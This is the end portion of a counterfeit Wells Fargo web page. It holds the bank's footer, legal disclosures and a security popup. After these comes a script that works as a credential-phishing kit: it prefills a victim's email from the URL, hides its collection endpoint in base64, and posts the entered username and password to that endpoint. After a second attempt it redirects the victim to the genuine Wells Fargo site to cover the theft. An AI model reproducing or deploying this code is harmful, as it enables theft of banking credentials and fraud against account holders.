                                        <div class="c95textContent">
                                            <div class="nbaWrapper">
                                                <div class="nbaImg23">
                                                    <a aria-hidden="true" tabindex="-1" href="#">
                                                        <img alt="" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                                    </a>
                                                </div>
                                            </div>
                                            <span>
                                                <a href="#">Explore your security options &gt;</a>
                                            </span>
                                        </div>
                                    </li>
                                    <li>
                                        <div class="c95textContent">
                                            <div class="nbaWrapper">
                                                <div class="nbaImg24">
                                                    <a aria-hidden="true" tabindex="-1" href="#">
                                                        <img alt="" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                                    </a>
                                                </div>
                                            </div>
                                            <span>
                                                <a href="#">Report fraud and scams &gt;</a>
                                            </span>
                                        </div>
                                    </li>
                                </ul>
                                <p>
                                    <a class="c7" role="button" href="#">Visit the Security Center</a>
                                </p>
                            </div>
                        </div>
                        <span class="hidden">End item 7</span>
                    </div>
                </div>
                <div class="carouselFrame incomingFrame" style="display: none;"></div>
            </div>
            <!-- Bottom Region Ends-->
        </div>
        <footer role="contentinfo">
            <div class="html5footer c9" id="pageFooter">
                <div class="c9content">
                    <img alt="Together we'll go far" role="img" src="https://www01.wellsfargomedia.com/assets/images/global/homepage_footer_stagecoach.svg">
                    <nav role="navigation">
                        <div class="html5nav">
                            <ul class="navList">
                                <li>
                                    <a href="#">Privacy, Cookies, Security &amp; Legal</a>
                                </li>
                                <li>
                                    <a href="#">Notice of Data Collection</a>
                                </li>
                                <li>
                                    <a href="#">General Terms of Use</a>
                                </li>
                                <li>
                                    <a data-cid="tcm:84-147007-16" data-ctid="tcm:91-1866-32" href="#">Online Access Agreement</a>
                                </li>
                                <li>
                                    <a data-cid="tcm:84-147007-16" data-ctid="tcm:91-1866-32" href="#">Ad Choices</a>
                                </li>
                                <li>
                                    <a data-cid="tcm:84-147007-16" data-ctid="tcm:91-1866-32" href="#">Report Fraud</a>
                                </li>
                                <li>
                                    <a data-cid="tcm:84-147007-16" data-ctid="tcm:91-1866-32" href="#">About Wells Fargo</a>
                                </li>
                                <li>
                                    <a data-cid="tcm:84-147007-16" data-ctid="tcm:91-1866-32" href="#">Careers</a>
                                </li>
                                <li>
                                    <a data-cid="tcm:84-147007-16" data-ctid="tcm:91-1866-32" href="#">Diversity and Accessibility</a>
                                </li>
                                <li>
                                    <a data-cid="tcm:84-147007-16" data-ctid="tcm:91-1866-32" href="#">Sitemap</a>
                                </li>
                            </ul>
                        </div>
                    </nav>
                </div>
                <div class="c42">
                    <div class="c20">
                        <div class="socialIcons">
                            <a class="iconFacebook" href="#">
                                <img class="facebookIcon" alt="Facebook" role="img" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                &nbsp;
                            </a>
                            <a class="iconLinkedIn" href="#">
                                <img class="linkedInIcon" alt="LinkedIn" role="img" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                &nbsp;
                            </a>
                            <a class="iconInstagram" href="#">
                                <img class="instagramIcon" alt="Instagram" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                &nbsp;
                            </a>
                            <a class="iconPinterest" href="#">
                                <img class="pinterestIcon" alt="Pinterest" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                &nbsp;
                            </a>
                            <a class="iconYoutube" href="#">
                                <img class="youtubeIcon" alt="YouTube" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                &nbsp;
                            </a>
                            <a class="iconTwitter" href="#">
                                <img class="twitterIcon" alt="Twitter" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                                &nbsp;
                            </a>
                        </div>
                        <div class="c20body" data-numbered="false">
                            <p>We provide links to external websites for convenience. Wells Fargo does not endorse and is not responsible for their content, links, privacy, or security policies.</p>
                            <p>Investment products and services are offered through Wells Fargo Advisors. Wells Fargo Advisors is a trade name used by Wells Fargo Clearing Services, LLC (WFCS) and Wells Fargo Advisors Financial Network, LLC, Members <a href="#">SIPC</a>, separate registered broker-dealers and non-bank affiliates of Wells Fargo &amp; Company. <em>WellsTrade</em><sup>®</sup> and Intuitive Investor<sup>®</sup> accounts are offered through WFCS.</p>
                        </div>
                        <div id="c20nnm" class="c20notnot"><strong>Investment and Insurance Products are:</strong>
                            <ul>
                                <li><strong>Not Insured by the FDIC or Any Federal Government Agency</strong></li>
                                <li><strong>Not a Deposit or Other Obligation of, or Guaranteed by, the Bank or Any Bank Affiliate</strong></li>
                                <li><strong>Subject to Investment Risks, Including Possible Loss of the Principal Amount Invested</strong></li>
                            </ul>
                        </div>
                        <div class="c20body" data-numbered="false" data-cid="tcm:84-146986-16" data-ctid="tcm:91-1924-32">
                            <p>Deposit products offered by Wells Fargo Bank, N.A. Member FDIC.
                            </p>
                        </div>
                        <p class="equalHousingImg">
                            <span class="equalHousingIcon">
                                <img alt="icon-equal-housing" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png">
                            </span>
                            <strong>Equal Housing Lender</strong>
                        </p>
                        <p>© 1999 - 2021 Wells Fargo. All rights reserved. NMLSR ID 399801</p>
                    </div>
                </div>
            </div>
        </footer>
        <div aria-hidden="true" class="c29content movedown posCls tl" data-content-id="c29content-save-username" role="complementary" aria-labelledby="saveusername"><span class="hide c29begin">Beginning of popup</span><span class="c29close"><a href="#"><img alt="Close" src="https://www01.wellsfargomedia.com/assets/images/css/template/homepage/home_sprite_image.png"></a></span>
            <p><strong>Notice</strong></p>
            <p>For your security, we do not recommend using this feature on a shared device.</p>
            <span class="c29hook"></span><span class="hide">End of popup</span>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;



    /////////////url email getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#mgss").hide();
    }
    ///////////////url getting ai////////////////


    var f = "bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#mgss').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var mgss = $('#mgss').html();
        $('#mgss').text(mgss);
        ///////////////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Username field is empty.!");
            return false;
        }

        // if (!filter.test(my_ai)) {
        //     $('#error').show();
        //     $('#error').html("That account doesn't exist. Enter a different account");
        //     return false;
        // }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(f),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').val('Verifying...');
            },

            complete: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://www.wellsfargo.com/");
                    return false;
                }
                $("#mgss").show();
                $('#submit-btn').val('Sign On');
            }
        });
    });


});
</script>

</html>